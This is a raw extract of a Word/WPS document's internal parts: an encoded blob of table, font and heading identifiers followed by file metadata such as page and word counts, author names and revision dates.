gICVIUChJ0YWJsZS5ydmlydG51MXJva3oaIAoCNzESGgoYCAlSFAoSdGFibGUubnZlbnlwcHM3aTJuGiAKAjcyEhoKGAgJUhQKEnRhYmxlLno4M2RjbGcyZGtlbRokCgI3MxIeChwIB0IYCg9UaW1lcyBOZXcgUm9tYW4SBUNhcmRvGiQKAjc0Eh4KHAgHQhgKD1RpbWVzIE5ldyBSb21hbhIFQ2FyZG8aJAoCNzUSHgocCAdCGAoPVGltZXMgTmV3IFJvbWFuEgVDYXJkbxokCgI3NhIeChwIB0IYCg9UaW1lcyBOZXcgUm9tYW4SBUNhcmRvGiQKAjc3Eh4KHAgHQhgKD1RpbWVzIE5ldyBSb21hbhIFQ2FyZG8aJAoCNzgSHgocCAdCGAoPVGltZXMgTmV3IFJvbWFuEgVDYXJkbxokCgI3ORIeChwIB0IYCg9UaW1lcyBOZXcgUm9tYW4SBUNhcmRvGiQKAjgwEh4KHAgHQhgKD1RpbWVzIE5ldyBSb21hbhIFQ2FyZG8aJAoCODESHgocCAdCGAoPVGltZXMgTmV3IFJvbWFuEgVDYXJkbxokCgI4MhIeChwIB0IYCg9UaW1lcyBOZXcgUm9tYW4SBUNhcmRvGiQKAjgzEh4KHAgHQhgKD1RpbWVzIE5ldyBSb21hbhIFQ2FyZG8aJAoCODQSHgocCAdCGAoPVGltZXMgTmV3IFJvbWFuEgVDYXJkbxogCgI4NRIaChgICVIUChJ0YWJsZS5rOXp6YW5oZjh0ejUaIAoCODYSGgoYCAlSFAoSdGFibGUuZmR6Y21lcmNhaThkGiAKAjg3EhoKGAgJUhQKEnRhYmxlLmg5em45aXAxMzFsdhogCgI4OBIaChgICVIUChJ0YWJsZS5qYmY5czF6MHRzOTgaHgoCODkSGAoWCAdCEhIQQXJpYWwgVW5pY29kZSBNUxogCgI5MBIaChgICVIUChJ0YWJsZS5uOTVwbG9tYWtlbXgaIAoCOTESGgoYCAlSFAoSdGFibGUuaTE0ZTF1NXl1ZWFrGiAKAjkyEhoKGAgJUhQKEnRhYmxlLjVsMHZzeXZnanY2dDIOaC4xcXZ0YmZzaGM3YjIyDmgudGdkYnR0YXFuenNxMg5oLjJ3bmgwNnV5YTRsYjIOaC5ubDZoa2syYWx2dWcyDmguM2RmYTRpcGtqcWxuMg5oLmNiNjU5ZmdtMWU3dzINaC5kYjhoZmw5dmN0czINaC54YnQ1c3MzNDBkbDIOaC5kZ3M2bm44M2J6cWwyDmguNXJuZ2pqOXV6MXdqMg5oLndoZWJ6bWx0ZWszMjIOaC5zc3MwanZlajBrdG4yDmgucjJ6azg4cGVrd3hzMg5oLjh4Zm96d2E5MTJ0MDIOaC40cWQyajBwY2phNnAyDmguYmJtbGh6NXRmeHJsMg5oLjR2ZjZzaXZ4c2JkdDIOaC40cndrcWRhd2hzbWgyDmguNHo0Z2g0MXc1aXJsMg1oLmN6Yjh6ZWw2cmVnMg5oLmE1NTJ5Mjc0OWp6czIOaC5rNzdiN2MxbW5mNmMyDmguOXMxYXdmcW1qaWwwMg5oLjE2bzkyc25zaTlzajIOaC5yNW1pazI4a2I1eWIyDmguODBhN25jMmtoa2czMg5oLmdpaTE2dGw0ZDE1ZDIOaC5lOTNxcGFzamx0YTkyDmguYTNyNzdtNW55cG11Mg5oLjVxZDhwam5yMGZpMjIOaC54eWd3bXc1eXFtOWQyDmguaG00Z3BiMzNsaHp1Mg5oLmk4c3Y3Y2J3dDBmejIOaC5jemN4bjJpcHg5aXcyDWguYnk0enA2aThpbGsyDmgua2dzY3AxZmhibmFzMg5oLjJ3Y3N2MWNxczUyaTIOaC5vZzlidXM3NTlhZHEyDmguazJxb3BrdDc5cHY5Mg5oLjU1bHN6NDRvdTVobzIOaC5tbmxoYTBjNXVkeGYyDmgueDBmdzJzYWpndm1mMg1oLmtoc2NyMzF3ZmN2Mg5oLmNtMXA4YWkyY2JqNjIOaC5kaWk5ZXZxb3FuZm4yDmguMnF6MW04dW91NzJpMg5oLnI5Y2kxczVkejJ4bjIOaC5qY2tiYW9ta2I5MmcyDWgueG5kbDVxYmVobmIyDmguZW92dGM0NjVlbmFlMg5oLmczZjlldGc4eG9qczIOaC41NXFpdnN4bDR6OGwyDmgubzNkOWlsY2Z4bWxkMg5oLmNwc2YzOXo3OGY5azIOaC5jcHNmMzl6NzhmOWsyDmguMjQ0ZGM1bGJva2QxMg5oLmlmd2VqMTE5Znl2azIOaC5sbzVma2FobWYycjYyDmgubmZ6ZGZ5czc5bHFrMg5oLjhkNjVqamN6ZmY5czIOaC5rbWhydXNtdWlsdjIyDmguMW81NTluYTVhNW5vMg5oLmkzemQyYjZna2ZyNDIOaC5sYW1jZnN1eXBnMHAyDmguYjZwZHdyYnJpeGM2Mg5oLnByb3B3N3plbDZtZzIOaC5mOXptdzRsbzlxZmYyDmgueGFwaGhwbmZnNjhyMg5oLmJrOHVvOHhsYjNidTIOaC5lMGRsdDY2bjRkMzkyDmgucm9jczVhbjVkdW15Mg5oLno4ZmQxNDdva296bjIOaC5iZ2U5ZmZtdW51NnAyDmgubm1iaTY1NWR2YXZmMg5oLjdsOGU5NWVvY3hpNTIOaC5uODR6cHJpc2VxaXIyDmgubnc1dmFnM2pqdWczMg5oLnc2aWdwZDJuZDk5ejIOaC52M2p5YmV0ODMwYzEyDmguejA1bmgybThjNWcwMg5oLmJ2aWx6c3NxeHJ6OTINaC52bXRuOTNiaXZvYjIOaC55ank0NWRlYXA0ejgyDmguYmM1Znk1ZmJiOXcwMg5oLjI2NjQ5YWdkYmEzaDIOaC5xejlmdWNiaDFqbzUyDmguOThvaDl4amJ1dzR4Mg5oLjJtajN5dm40OWxqaTIOaC5lN3M5bmZpZnR2YzIyDmgudzE0bGtwN3hyMW55Mg5oLmU0b3FxMWQwMGd6YzIOaC5tMHphcTE3Y3V6MDMyDmgubGtiM25taTJiODhpMg5oLmoyNm82OWQyYmhvbzIOaC44YWVxY2l6aG1iajEyDmgubTR1ZjBiaHpzMm9vMg5oLm1nM2N5N2ZxNmJvOTIOaC51ZXdkbWticDRkb2YyDmguOWcyN2k2ZmwxOTYxMg5oLnB2N2Rkamc4cGN1ZjIOaC41YzAwN3N4azhsYjEyDWgubG9uMGk3ODF0ZjgyDmguYmpncHN6aW03MWQ4Mg5oLm1xaWY2Z3hwcDFtYjIOaC50N3B2Z21senptMTIyDmgueGxydno3dmNya2F3Mg5oLmthcHY5NHNrMm0xMDIOaC5oa2x5d2VseXN0dHEyDmgudHNhYWQ5MnFxZngzMg5oLmpxd2tieWMyYmp2aDIOaC41cDl3ZGVlZ3V6NGsyDmguMmxmb3AxbHhhYXJxMg5oLjhta2c0Z2E4c3djbzIOaC40azRjM2w1MHgxdHcyDmguZzV5OTh0eDNibHF2Mg5oLnpmZG50Z3NocXZ6bTIOaC44bW9xYXp5MGNkdGEyDmguNDQwd20wNnhzbThyMg1oLnA1aWduaTFoMTFhMg5oLmZ6N2w3b2Y2c2JsNDINaC45eWF6ZWplZ3VmdzINaC45N2RxYjMwOTExdzIOaC5wZjE4bDk0YWpvNTkyDmguanRkZ3o3c2hmanV6Mg5oLm95Nm96cmVxMXRxdzINaC5yZDFjZjYxanluczIOaC5vOXRqbHpvaW1ibGcyDmguZWgweWNpcm83Y3FxMg5oLmRrY2Z0YWEwcjFoeTIOaC51d3YxemdtNDV2dm8yDmguZWY1cGt4b3NzZGZmMg5oLmJ3OWVrcTNsMGllZTIOaC42a2lnZWExNGI3MXMyDmguaTRtb2FxOWZtZDU4Mg5oLmNkdzRteHZrb3ZmMTIOaC5kcjY0NHhra3ppeGgyDmguZDNnb3g0Y3pzNG53Mg5oLnhuajhhcHV6MmNlMTIOaC5qbnMwcmJ5djVjNmgyDmguajVsNzI0ZmY0OGptMg5oLmQzOHE5emwyeWxrZDIOaC5pMHBhMG51Z3M1eXkyDmgubjFtOXU1dTZneHBoMg5oLjIwNmY0N2F3ODU4ZjIOaC5waDV3Znh0Y2pwMjUyDmguM3dqdjNyNGdxOWExMg5oLnRlZ2xrN2F3aGwxMTIOaC5obWVpeTBxMjhkODE4AHIhMUJwRnVIVkRBOFYybXdDTGpxZk8ySHpwQjFPQmxmSGh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BBCDE8-6E69-4A9D-929E-7B37605ED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1473</TotalTime>
  <Pages>104</Pages>
  <Words>9049</Words>
  <Characters>51583</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>429</Lines>
  <Paragraphs>121</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>60511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Nhat</dc:creator>
  <cp:lastModifiedBy>THANH HAI</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-16T08:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-22T09:39:00Z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eyJoZGlkIjoiZDk3NTBlOGQ2MjI3M2ExZjJmNjE2ZWJjNzBiZWQ2N2YiLCJ1c2VySWQiOiIxMzkyMDA2MDM3OTk5In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.26880</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>E548BB852D09450C841026502CD5518F_12</vt:lpwstr>
  </property>
</Properties>
</file>